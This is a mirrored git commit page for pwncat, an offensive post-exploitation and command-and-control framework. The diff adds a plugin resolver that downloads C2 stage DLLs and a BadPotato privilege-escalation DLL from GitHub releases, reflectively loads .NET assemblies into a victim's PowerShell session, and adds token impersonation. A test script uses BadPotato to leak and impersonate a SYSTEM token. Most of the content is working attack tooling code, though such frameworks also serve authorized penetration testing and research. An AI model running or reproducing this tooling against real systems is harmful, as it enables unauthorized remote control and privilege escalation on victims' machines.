1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00

Cleaned up plugin system

- Added builtin plugin resolver
- Rolled base c2 dlls into plugin resolver
- Changed plugin location configuration from `windows_c2_dir` to `plugin_path`
This commit is contained in:
Caleb Stewart 2021-06-12 03:10:14 -04:00
parent 274c4b6cab
commit ac74c3d013
10 changed files with 290 additions and 20 deletions

View File

@ -4,12 +4,7 @@ import textwrap
import pwncat
import pwncat.modules
from pwncat.util import console
from pwncat.commands import (
Complete,
Parameter,
CommandDefinition,
get_module_choices,
)
from pwncat.commands import Complete, Parameter, CommandDefinition, get_module_choices
class Command(CommandDefinition):
@ -92,6 +87,11 @@ class Command(CommandDefinition):
console.log(f"[red]error[/red]: invalid argument: {exc}")
return
if isinstance(result, list):
result = [r for r in result if not r.hidden]
elif result.hidden:
result = None
if args.raw:
console.print(result)
else:

View File

@ -27,8 +27,10 @@ import ipaddress
from typing import Any, Dict, List, Union
from prompt_toolkit.keys import ALL_KEYS, Keys
from prompt_toolkit.input.ansi_escape_sequences import (ANSI_SEQUENCES,
REVERSE_ANSI_SEQUENCES)
from prompt_toolkit.input.ansi_escape_sequences import (
ANSI_SEQUENCES,
REVERSE_ANSI_SEQUENCES,
)
from pwncat.modules import BaseModule
@ -72,6 +74,9 @@ def local_file_type(value: str) -> str:
def local_dir_type(value: str) -> str:
""" Ensure the path specifies a local directory """
# Expand ~ in the path
value = os.path.expanduser(value)
if not os.path.isdir(value):
raise ValueError(f"{value}: no such file or directory")
return value
@ -109,7 +114,7 @@ class Config:
"cross": {"value": None, "type": str},
"psmodules": {"value": ".", "type": local_dir_type},
"verbose": {"value": False, "type": bool_type},
"windows_c2_dir": {
"plugin_path": {
"value": "~/.local/share/pwncat",
"type": local_dir_type,
},

View File

@ -43,6 +43,7 @@ class Fact(Result, persistent.Persistent):
self.types: PersistentList = types
# The original procedure that found this fact
self.source: str = source
self.hidden: bool = False
def __eq__(self, o):
"""This is probably a horrible idea.

View File

@ -62,6 +62,7 @@ class WindowsUser(User):
principal_source: str,
password: Optional[str] = None,
hash: Optional[str] = None,
well_known: bool = False,
):
super().__init__(
source=source, name=name, uid=uid, password=password, hash=hash
@ -78,6 +79,7 @@ class WindowsUser(User):
self.password_last_set: Optional[datetime] = password_last_set
self.last_logon: Optional[datetime] = last_logon
self.principal_source: str = principal_source
self.hidden: bool = well_known
def __repr__(self):
if self.password is None and self.hash is None:

View File

@ -257,7 +257,7 @@ class Session:
try:
# Ensure this bar is started if we are the selected
# target.
if self.manager.target == self and not started:
if not started:
self._progress = rich.progress.Progress(
"{task.fields[platform]}",
"",

View File

@ -136,6 +136,9 @@ class Result:
:func:`category` method helps when organizing output with the ``run``
command."""
hidden: bool = False
""" Hide results from automatic display with the ``run`` command """
def category(self, session) -> str:
"""Return a "category" of object. Categories will be grouped.
If this returns None or is not defined, this result will be "uncategorized"

View File

@ -41,3 +41,48 @@ class Module(EnumerateModule):
last_logon=None,
principal_source=user["PrincipalSource"],
)
well_known = {
"S-1-0-0": "NULL AUTHORITY\\NOBODY",
"S-1-1-0": "WORLD AUTHORITY\\Everyone",
"S-1-2-0": "LOCAL AUTHORITY\\Local",
"S-1-3-0": "CREATOR AUTHORITY\\Creator Owner",
"S-1-3-1": "CREATOR AUTHORITY\\Creator Group",
"S-1-3-4": "CREATOR AUTHORITY\\Owner Rights",
"S-1-4": "NONUNIQUE AUTHORITY",
"S-1-5-1": "NT AUTHORITY\\DIALUP",
"S-1-5-2": "NT AUTHORITY\\NETWORK",
"S-1-5-3": "NT AUTHORITY\\BATCH",
"S-1-5-4": "NT AUTHORITY\\INTERACTIVE",
"S-1-5-6": "NT AUTHORITY\\SERVICE",
"S-1-5-7": "NT AUTHORITY\\ANONYMOUS",
"S-1-5-9": "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
"S-1-5-10": "NT AUTHORITY\\PRINCIPAL SELF",
"S-1-5-11": "NT AUTHORITY\\AUTHENTICATED USERS",
"S-1-5-12": "NT AUTHORITY\\RESTRICTED CODE",
"S-1-5-13": "NT AUTHORITY\\TERMINAL SERVER USERS",
"S-1-5-14": "NT AUTHORITY\\REMOTE INTERACTIVE LOGON",
"S-1-5-17": "NT AUTHORITY\\IUSR",
"S-1-5-18": "NT AUTHORITY\\SYSTEM",
"S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
"S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
}
for sid, name in well_known.items():
yield WindowsUser(
source=self.name,
name=name,
uid=sid,
account_expires=None,
description=None,
enabled=True,
full_name=name,
password_changeable_date=None,
password_expires=None,
user_may_change_password=None,
password_required=None,
password_last_set=None,
last_logon=None,
principal_source="well known sid",
well_known=True,
)

View File

@ -301,7 +301,7 @@ class Path:
"""Open the file pointed to by the path, like Platform.open"""
return self._target.open(
self,
str(self),
mode=mode,
buffering=buffering,
encoding=encoding,

View File

@ -22,12 +22,14 @@ import time
import base64
import shutil
import signal
import hashlib
import pathlib
import tarfile
import termios
import binascii
import readline
import textwrap
import functools
import subprocess
from io import (
BytesIO,
@ -50,7 +52,7 @@ import pwncat.subprocess
from pwncat.platform import Path, Platform, PlatformError
INTERACTIVE_END_MARKER = b"INTERACTIVE_COMPLETE\r\n"
PWNCAT_WINDOWS_C2_VERSION = "v0.2.0"
PWNCAT_WINDOWS_C2_VERSION = "v0.2.1"
PWNCAT_WINDOWS_C2_RELEASE_URL = "https://github.com/calebstewart/pwncat-windows-c2/releases/download/{version}/pwncat-windows-{version}.tar.gz"
@ -180,7 +182,7 @@ class WindowsFile(RawIOBase):
try:
result = self.platform.run_method(
"File", "write", self.handle, base64.b64encode(data)
"File", "write", self.handle, base64.b64encode(data).decode("utf-8")
)
except ProtocolError as exc:
# ERROR_BROKEN_PIPE
@ -194,6 +196,43 @@ class WindowsFile(RawIOBase):
return nwritten
class DotNetPlugin(object):
"""Represents a reflectively loaded .Net plugin within the remote C2
This class is a helper which makes calling methods within a plugin
more straightforward. If you want to call a method named ``get_system``
you can use one of two syntaxes:
.. code-block:: python
plugin.run("get_system", "arguments", 1, 2, False)
plugin.get_system("arguments", 1, 2, False)
:param name: basename of the file which was loaded
:type name: str
:param checksum: md5sum of the assembly
:type checksum: str
:param ident: identifier for the remote assembly
:type ident: int
"""
def __init__(self, platform: "Windows", name: str, checksum: str, ident: int):
self.names = [name]
self.checksum = checksum
self.ident = ident
self.platform = platform
def __getattr__(self, key: str):
"""Shortcut for calling a method. ``plugin.method()`` is equivalent
to ``plugin.run("method")``."""
return functools.partial(self.run, key)
def run(self, method: str, *args):
""" Execute a method within the plugin """
return self.platform.run_method("Reflection", "call", self.ident, method, args)
class PopenWindows(pwncat.subprocess.Popen):
"""
Windows-specific Popen wrapper class
@ -381,6 +420,20 @@ class PopenWindows(pwncat.subprocess.Popen):
return (stdout, stderr)
@dataclass
class BuiltinPluginInfo:
""" Tells pwncat where to find a builtin plugin """
name: str
""" A friendly name used when loading the plugin """
provides: List[str]
""" List of DLL names which this plugin provides """
url: str
""" URL pointing to a tar.gz file containing the plugin DLL(s) """
version: str
""" The version number to download (this is formatted into the URL) """
class Windows(Platform):
"""Concrete platform class abstracting interaction with a Windows/
Powershell remote host. The remote windows host must support
@ -389,6 +442,70 @@ class Windows(Platform):
name = "windows"
PATH_TYPE = pathlib.PureWindowsPath
C2_VERSION = "v0.2.1"
PLUGIN_INFO = [
BuiltinPluginInfo(
name="windows-c2",
provides=["stageone.dll", "stagetwo.dll"],
url="https://github.com/calebstewart/pwncat-windows-c2/releases/download/{version}/pwncat-windows-{version}.tar.gz",
version="v0.2.1",
),
BuiltinPluginInfo(
name="badpotato",
provides=["BadPotato.dll"],
url="https://github.com/calebstewart/pwncat-badpotato/releases/download/{version}/pwncat-badpotato-{version}.tar.gz",
version="v0.0.1-alpha",
),
]
def open_plugin(self, name: str) -> BytesIO:
"""
Open the given plugin DLL for reading and return an open file object.
If the given name matches a builtin plugin, it will be used. If a
builtin plugin is not available, it will be downloaded from it's URL
and saved in the provided plugin path.
:param name: name of the plugin being requested
:type name: str
:param plugin_path: path to the directory to store plugins
:type plugin_path: str
:rtype: BytesIO
"""
for plugin in self.PLUGIN_INFO:
if name in plugin.provides:
break
else:
return open(name, "rb")
path = (
pathlib.Path(self.session.config["plugin_path"])
/ plugin.name
/ plugin.version
/ name
).expanduser()
if not path.exists():
path.parent.mkdir(parents=True, exist_ok=True)
url = plugin.url.format(version=plugin.version)
with self.session.task(
f"downloading {plugin.name}", status="grabbing archive"
) as task:
with requests.get(
plugin.url.format(version=plugin.version),
stream=True,
) as request:
data = request.raw.read()
with tarfile.open(mode="r:gz", fileobj=BytesIO(data)) as tar:
for provided in plugin.provides:
self.session.update_task(
task, status=f"extracting {provided}"
)
with tar.extractfile(provided) as provided_filp:
with (path.parent / provided).open("wb") as output:
shutil.copyfileobj(provided_filp, output)
return path.open("rb")
def __init__(
self,
@ -400,6 +517,7 @@ class Windows(Platform):
super().__init__(session, channel, *args, **kwargs)
self.name = "windows"
self.plugins = []
# Initialize interactive tracking
self._interactive = False
@ -415,9 +533,6 @@ class Windows(Platform):
# Tracks paths to modules which have been sideloaded into powershell
self.psmodules = []
# Ensure we have the C2 libraries downloaded
self._ensure_libs()
self._bootstrap_stage_two()
self.refresh_uid()
@ -427,7 +542,6 @@ class Windows(Platform):
# Load requested libraries
# for library, methods in self.LIBRARY_IMPORTS.items():
# self._load_library(library, methods)
#
def exit(self):
"""Ensure the C2 exits on the victim end. This is called automatically
@ -574,7 +688,8 @@ function prompt {
)
# Read the loader
with stageone.open("rb") as filp:
# with stageone.open("rb") as filp:
with self.open_plugin("stageone.dll") as filp:
loader_dll = base64.b64encode(filp.read())
# Extract first chunk
@ -657,7 +772,7 @@ function prompt {
self.channel.recvuntil(b"\n")
# Load, Compress and Encode stage two
with stagetwo.open("rb") as filp:
with self.open_plugin("stagetwo.dll") as filp:
stagetwo_dll = filp.read()
compressed = BytesIO()
with gzip.GzipFile(fileobj=compressed, mode="wb") as gz:
@ -1343,3 +1458,70 @@ function prompt {
raise PowershellError(exc.message)
return [json.loads(x) for x in result["output"]]
def impersonate(self, token: int):
"""Impersonate a user token in the powershell and .net contexts.
:param token: the user token to impersonate
:type token: int
"""
try:
return self.run_method("Identity", "Impersonate", token)
except ProtocolError:
return False
def revert_to_self(self):
""" Revert any impersonations and return to the original user """
return self.impersonate(0)
def dotnet_load(
self, name: str, content: Optional[Union[bytes, BytesIO]] = None
) -> DotNetPlugin:
"""
Reflectively load a .Net C2 plugin from the attacker machine. The
plugin DLL should implement the ``Plugin`` class and method interface.
:param name: name or path to the DLL to upload
:type name: str
:param content: content of the DLL to load or file-like object, if not present on disk
:type content: Optional[Union[bytes, BytesIO]]
"""
try:
plugin = [plugin for plugin in self.plugins if name in plugin.names][0]
return plugin
except IndexError:
pass
if content is None:
with self.open_plugin(name) as filp:
content = filp.read()
if not isinstance(content, bytes):
content = content.read()
# Calculate the digest
checksum = hashlib.md5(content).hexdigest()
# Ensure we haven't loaded the same plugin under another name
try:
plugin = [plugin for plugin in self.plugins if plugin.checksum == checksum][
0
]
plugin.names.append(name)
return plugin
except IndexError:
pass
# Encode the assembly
assembly = base64.b64encode(content).decode("utf-8")
# Load the assembly. Let protocol errors propogate
ident = self.run_method("Reflection", "load", assembly)
plugin = DotNetPlugin(self, name, checksum, ident)
self.plugins.append(plugin)
return plugin

34
test.py
View File

@ -20,4 +20,36 @@ with pwncat.manager.Manager("data/pwncatrc") as manager:
# session = manager.create_session("linux", host="pwncat-ubuntu", port=4444)
# session = manager.create_session("linux", host="127.0.0.1", port=4445)
print(session.platform.Path("./nonexistent.txt").resolve())
# session.platform.powershell("amsiutils")
try:
# Load the BadPotato plugin
session.log("leaking system token w/ BadPotato")
badpotato = session.platform.dotnet_load("BadPotato.dll")
# Call the method within the DLL to leak a system token
system_token = badpotato.get_system_token()
session.log(f"found system token: {system_token}")
session.log("impersonating token...")
# Impersonate the SYSTEM token
session.platform.impersonate(system_token)
# Checkout our active user through powershell
result = session.platform.powershell(
"[System.Security.Principal.WindowsIdentity]::GetCurrent().Name"
)
session.log(f"now running as: {result[0]}")
session.platform.refresh_uid()
session.log(session.platform.getuid())
session.log(session.find_user(uid=session.platform.getuid()))
except (
pwncat.platform.windows.ProtocolError,
pwncat.platform.windows.PowershellError,
) as exc:
session.log(f"badpotato failed: {exc}")
manager.interactive()